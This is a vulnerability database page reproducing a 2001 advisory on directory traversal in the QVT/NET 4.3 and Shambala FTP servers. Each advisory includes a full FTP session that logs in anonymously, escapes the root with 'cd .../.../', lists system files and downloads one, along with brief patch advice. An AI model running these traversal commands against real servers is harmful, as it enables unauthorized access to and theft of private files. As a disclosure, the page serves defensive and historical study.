Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

alt3kx-advisories-2001.txt

🗓️ 06 Jun 2001 00:00:00Reported by Alt3kxType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 37 Views

QVT/NET FTP server vulnerability allows directory traversal and unauthorized file access.

Code
`  
  
======================================================================  
  
QVT/NET 4.3 FTP server Directory Traversal  
  
  
Author: alt3kx! <[email protected]>  
Date: 2001-05-22  
Site: www.raza-mexicana.org  
  
Greet to: _0x90_, dr_fdisk^, Dex, PaTa  
Teams: Raregazz - X-ploit and S0d  
  
vicente F0x no rulas wey!  
======================================================================  
------------------------=[Brief Description]=-------------------------  
  
QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.  
A bug allows any user to change to any directory and see files to PATH  
also GET files remotely.  
  
----------------------------=[Plataforms]=-------------------------------  
  
Windows 9.x  
Windows NT  
windows 2000  
  
  
-----------------------------=[Summary]=---------------------------------  
  
  
When sending the command "CWD ..." (or "cd ..." in the default FTP  
client), the server will go one directory up.  
  
  
  
EXploit:  
  
  
C:\>ftp server.vulnerable.com  
Connected to server.vulnerable.com.  
220 shell FTP server (QVT/Net 4.3) ready.  
User (server.vulnerable.com:(none)): anonymous  
331 Guest login OK, please send real ident as password.  
Password:  
230 Guest login OK, access restrictions apply.  
ftp> cd ..  
501 CWD command not allowed.  
  
SO THE BUG... ...  
  
ftp>cd .../.../.../.../.../.../  
250 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).  
-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe  
drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6  
drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup  
-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe  
-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe  
drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton  
drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files  
drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins  
  
.  
.  
.  
.  
  
-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt  
drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX  
drwxrwxrwx 1 nobody system 0 May 8 13:17 teens  
drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp  
-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt  
226 Transfer complete.  
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.  
  
ftp> get raza-alt3kx.txt  
200 PORT command successful.  
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106)   
(168 bytes).  
226 Transfer complete.  
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.  
ftp>quit  
221 Goodbye.  
  
  
  
C:\>type raza-alt3kx.txt  
  
Bug discovered by alt3kx! <[email protected]>  
  
  
C:\>  
  
  
-------------------------------=[Patch]=---------------------------------  
  
The recomended action is to changue the persmissions or define  
individual directory for users anonymous with files no compromise.  
  
-------------------------=[Company Compromise]=--------------------------  
  
Company:  
  
http//www.qpc.com  
  
  
  
  
  
  
======================================================================  
  
  
Shambala FTP server Directory Traversal  
  
  
Author: alt3kx! <[email protected]>  
Date: 2001-05-22  
Site: www.raza-mexicana.org  
  
Greet to: _0x90_, dr_fdisk^, Dex, PaTa  
Teams: Raregazz - X-ploit and S0d  
  
vicente F0x no rulas weyete!  
======================================================================  
------------------------=[Brief Description]=-------------------------  
  
Shambala FTP Server is an FTP server for Windows 9x/NT/2000.  
A bug allows any user to change to any directory and see files to PATH  
also GET files remotely.  
  
----------------------------=[Plataforms]=-----------------------------  
  
Windows 9.x  
Windows NT  
windows 2000  
  
  
-----------------------------=[Summary]=---------------------------------  
  
  
When sending the command "CWD ..." (or "cd ..." in the default FTP  
client), the server will go one directory up.  
  
  
  
Exploit:  
  
alt3kx@machine:/tmp$ ftp 1.xx.xx.xx  
Connected to 1.xx.xx.xx.  
220 1.xx.xx.xx - Shambala FTP Server Ready.  
Name (1.xx.xx.xx:Administrator): anonymous  
331 Password required for anonymous.  
Password:  
230 User anonymous logged in.  
ftp> cd ..  
550 Requested action not taken. Permission denied.  
ftp> pwd  
257 "/" is current directory.  
ftp> dir  
200 PORT command successful.  
150 Opening data connection.  
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx  
---------- owner group 283 21-maj-01 17:55   
index-_-1_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-2_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-3_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-4_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-5_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-6_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-7_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-8_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-9_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-10_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-11_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-12_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-13_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-14_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-15_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_-16_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_0_0_0.htm  
---------- owner group 283 21-maj-01 17:55   
index-_0_0_-1.htm  
---------- owner group 283 21-maj-01 17:55 .htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-2.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-3.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-4.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-5.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-6.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-7.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-8.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-9.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-10.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-11.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_0_-12.htm  
---------- owner group 283 21-maj-01 18:08   
index-_0_-1_-11.htm  
---------- owner group 283 21-maj-01 18:08   
index-_1_0_-11.htm  
---------- owner group 283 21-maj-01 18:08   
index-_-1_0_-11.htm  
  
226 Transfer complete  
ftp> cd ../  
550 Requested action not taken. Permission denied.  
ftp>  
  
EXPLOIT... ...  
  
ftp> cd /.../.../  
257 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening data connection.  
---------- owner group 15444 04-maj-01 14:26 SCAN.log  
---------- owner group 140340 04-maj-01 14:05   
MAILS-PRESIDENCIA.txt  
---------- owner group 466944 18-sep-99 09:32 Shambala.exe  
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG  
---------- owner group 31 21-maj-01 17:50   
passwordsxxx.txt  
d--------- owner group 0 21-maj-01 17:50 Web  
226 Transfer complete.  
ftp>  
  
  
ftp> cd /.../.../.../.../  
257 CWD command successful.  
ftp> dir  
200 PORT command successful.  
150 Opening data connection.  
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe  
d--------- owner group 0 18-jan-01 15:39 Netscape 6  
d--------- owner group 0 18-jan-01 14:50 Netscape 6   
Setup  
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe  
  
.  
.  
.  
.  
.  
  
---------- owner group 168 21-maj-01 19:07   
raza-alt3kx.txt  
  
ftp> get raza-alt3kx.txt  
200 PORT command successful.  
150 Opening data connection.  
226 Transfer complete.  
168 bytes received in 0 seconds (168 bytes/s)  
ftp> quit  
221 Goodbye.  
  
  
alt3kx@machine:/tmp$ cat raza-alt3kx.txt  
  
  
Bug discovered by alt3kx! <[email protected]>  
  
  
alt3kx@machine:/tmp$  
  
  
  
-------------------------------=[Patch]=------------------------------  
  
The recomended action is to changue the persmissions or define  
individual directory for users anonymous with files not compromise.  
  
  
-------------------------=[Company Compromise]=-----------------------  
  
http://www.evolvable.com  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jun 2001 00:00Current
7.4High risk
Vulners AI Score7.4
qvt/net ftp serverdirectory traversalwindows 9xwindows ntwindows 2000unauthorized access
37